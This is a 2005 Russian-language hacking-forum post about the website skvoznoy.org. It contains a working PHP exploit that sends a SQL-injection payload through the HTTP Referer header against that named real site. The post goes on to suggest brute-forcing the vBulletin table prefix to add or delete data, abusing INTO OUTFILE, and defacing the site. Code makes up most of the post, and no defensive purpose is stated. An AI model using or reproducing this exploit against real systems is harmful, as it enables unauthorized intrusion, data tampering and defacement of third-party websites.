Тема: =d
Показать сообщение отдельно

skvoznoy.org
  #1  
Старый 05.12.2005, 16:07
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами: 11156006

Репутация: 749


По умолчанию skvoznoy.org
Мимо проходил. Сайт из серии крутых хакеров:

skvoznoy.org

____________________________________
$fp=fsockopen("skvoznoy.org",80);

fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0
Referer: http://skvoznoy.org/news/332/' union select 0,0/*

");
$get= fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp)
.fgets($fp).fgets($fp);
fclose($fp);
echo $get;
____________________________________

SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ.
Еще можно сбрутить имя таблицы новостей и задефейсить сайт
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Zadoxlik; 05.12.2005 в 16:33.. Причина: сменил тему
 
Ответить с цитированием